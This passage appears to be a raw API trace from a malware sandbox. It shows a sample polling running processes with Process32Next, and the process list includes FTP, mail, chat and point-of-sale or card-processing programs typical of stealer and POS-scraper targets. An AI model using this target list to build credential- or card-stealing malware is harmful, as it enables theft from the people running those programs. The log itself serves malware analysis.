[0105.898] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.899] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0105.900] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.901] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.904] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0105.906] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0105.907] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0105.908] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0105.910] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.911] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.912] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0105.914] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0105.915] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0105.916] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0105.918] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0105.920] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0105.921] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0105.922] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0105.924] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0105.925] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0105.926] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0105.928] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0105.929] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0105.930] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0105.932] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0105.933] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0105.936] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0105.937] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0105.938] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0105.940] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0105.941] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0105.942] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0105.944] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0105.945] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0105.947] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0105.948] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0105.952] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0105.953] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0105.955] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0105.957] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0105.958] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0105.960] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0105.962] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0105.964] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0105.966] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0105.967] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0105.969] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0105.970] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0105.972] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0105.975] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0105.976] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0105.978] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0105.979] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0105.981] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0105.983] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0105.984] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0105.986] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0105.987] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0105.989] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0105.990] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0105.992] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0105.993] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0105.995] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0105.999] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0106.001] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0106.002] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0106.004] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0106.005] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0106.007] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0106.008] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0106.010] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0106.011] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0106.013] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0106.014] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0106.016] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0106.017] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0106.019] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0106.020] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0106.021] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.023] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.024] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0106.026] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0106.027] CloseHandle (hObject=0x1c08) returned 1 [0106.028] Sleep (dwMilliseconds=0x64) [0106.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0106.148] Process32First (in: 